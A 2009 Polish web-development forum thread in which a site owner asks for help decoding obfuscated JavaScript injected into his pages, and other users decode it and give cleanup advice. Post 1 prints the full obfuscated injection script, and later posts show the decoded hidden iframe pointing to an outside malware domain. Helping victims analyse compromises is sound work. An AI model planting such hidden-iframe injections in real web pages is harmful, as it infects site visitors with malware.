Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> rozszyfrowanie kodu
karis
post
Post #1





Grupa: Zarejestrowani
Postów: 217
Pomógł: 2
Dołączył: 23.12.2008

Ostrzeżenie: (0%)
-----


czesc

bardzo was prosze pomozcie mi rozszyforwac ten kod, bo ktos go wstrzyknal na moje serwisy internetowe i to jest wirus tzn sciaga sie wirus i teraz ktos moim kompoem zarzadza i wysyla jakies informacje na gg innym


Kod
<!-- ad --><script>
  uyimh=687;
  qxcxg=4804;
  ddytx=7948;
  xkjpv="write";
  mzsrv="me";
  zqfqw="et";
  gdtrk="/' st";
  rpiia="yl";
  qxaol="";
  ldlvw="i";
  zfhuu="ty";
  hvkhb=":h";
  hbqmm="d";
  hauzn="";
  zdqdp=4;
  sjgbi="if";
  rpygo="r";
  syjnh=" sr";
  rwanv="c";
  elujl="=";
  hrgnc=863;
  akzpp=8853;
  tplxn=" ";
  cvtot="</";
  qtndm="";
  jlooz=3953;
  uyimh=687;
  qxcxg=4804;
  ddytx=7948;
  xkjpv="write";
  mzsrv="me";
  zqfqw="et";
  gdtrk="/' st";
  rpiia="yl";
  qxaol="";
  ldlvw="i";
  zfhuu="ty";
  hvkhb=":h";
  hbqmm="d";
  hauzn="";
  zdqdp=4;
  sjgbi="if";
  rpygo="r";
  syjnh=" sr";
  rwanv="c";
  elujl="=";
  hrgnc=863;
  akzpp=8853;
  tplxn=" ";
  cvtot="</";
  qtndm="";
  jlooz=3953;
  gftzo=(9.007e3>=5e1?uyimh:qxcxg);
  jjaqh=(ddytx>.2438?xkjpv:3.);
  gmbpt=(7.3e1>=36?mzsrv:.45);
  zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
  hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
  rmtyf=(6.5e1,"");
  
  aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad --></BODY></HTML>
  <script type="text/javascript"><!--


Ten post edytował karis 1.03.2009, 19:37:58
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 9)
Foxx
post
Post #2





Grupa: Zarejestrowani
Postów: 896
Pomógł: 76
Dołączył: 15.11.2003
Skąd: Sosnowiec/Kraków

Ostrzeżenie: (0%)
-----


Usuń dodany kod z plików, zmień hasła na kontach, nie wprowadzaj ich do total commandera i innych managerów ftp, przeskanuj komputer. Wirus to chyba VBS:Malware-gen.
Go to the top of the page
+Quote Post
karis
post
Post #3





Grupa: Zarejestrowani
Postów: 217
Pomógł: 2
Dołączył: 23.12.2008

Ostrzeżenie: (0%)
-----


a moze mi ktos ten kod rozszyfroac bo chce wiedziec co dokladnie sie tam robi
Go to the top of the page
+Quote Post
tommy4
post
Post #4





Grupa: Zarejestrowani
Postów: 288
Pomógł: 12
Dołączył: 2.12.2005

Ostrzeżenie: (0%)
-----


A skąd my mamy mieć pewność, że to nie Ty napisałeś 'wirusa' i przypadkiem nie chcesz, żebyśmy odpalili skrypt powyżej? (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)
Go to the top of the page
+Quote Post
karis
post
Post #5





Grupa: Zarejestrowani
Postów: 217
Pomógł: 2
Dołączył: 23.12.2008

Ostrzeżenie: (0%)
-----


pewnosci nie macie zadnej chce jedynie abyscie pomogli mi go rozszyfrowac nie musicie nic odpalac chce znac adres strony z ktora sie laczy
Go to the top of the page
+Quote Post
erix
post
Post #6





Grupa: Moderatorzy
Postów: 15 467
Pomógł: 1451
Dołączył: 25.04.2005
Skąd: Szczebrzeszyn/Rzeszów




Z tego, co po kodzie widać, to podałeś tylko pierwszą część, czyli zakodowany skrypt. Ale dekodera tu nie widzę. (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)
Go to the top of the page
+Quote Post
karis
post
Post #7





Grupa: Zarejestrowani
Postów: 217
Pomógł: 2
Dołączył: 23.12.2008

Ostrzeżenie: (0%)
-----


probowalem sobie w edytorze za pomoca funkcji fin&replace i rozszyfrowalem tylko pokazanie diva natomiast adresu nie do konca rozszyforwalem
Go to the top of the page
+Quote Post
l0ud
post
Post #8





Grupa: Zarejestrowani
Postów: 1 387
Pomógł: 273
Dołączył: 18.02.2008

Ostrzeżenie: (0%)
-----


Kod
<iframe src="http://truittbros.net/" style="visibility: hidden;"></iframe>
Go to the top of the page
+Quote Post
Kocurro
post
Post #9





Grupa: Zarejestrowani
Postów: 461
Pomógł: 32
Dołączył: 17.09.2003
Skąd: Łódź

Ostrzeżenie: (0%)
-----


A na przyszłość polecam korzystanie z Firebug'a - nie traciłbyś czasu na pisanie posta na forum...
Go to the top of the page
+Quote Post
Orkan
post
Post #10





Grupa: Zarejestrowani
Postów: 55
Pomógł: 4
Dołączył: 19.05.2003
Skąd: Gdańsk

Ostrzeżenie: (0%)
-----


Cytat(l0ud @ 1.03.2009, 23:48:58 ) *
Kod
<iframe src="http://truittbros.net/" style="visibility: hidden;"></iframe>


a kto zjadl document.write() ? (IMG:http://forum.php.pl/style_emoticons/default/czarodziej.gif)
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 22.08.2025 - 19:35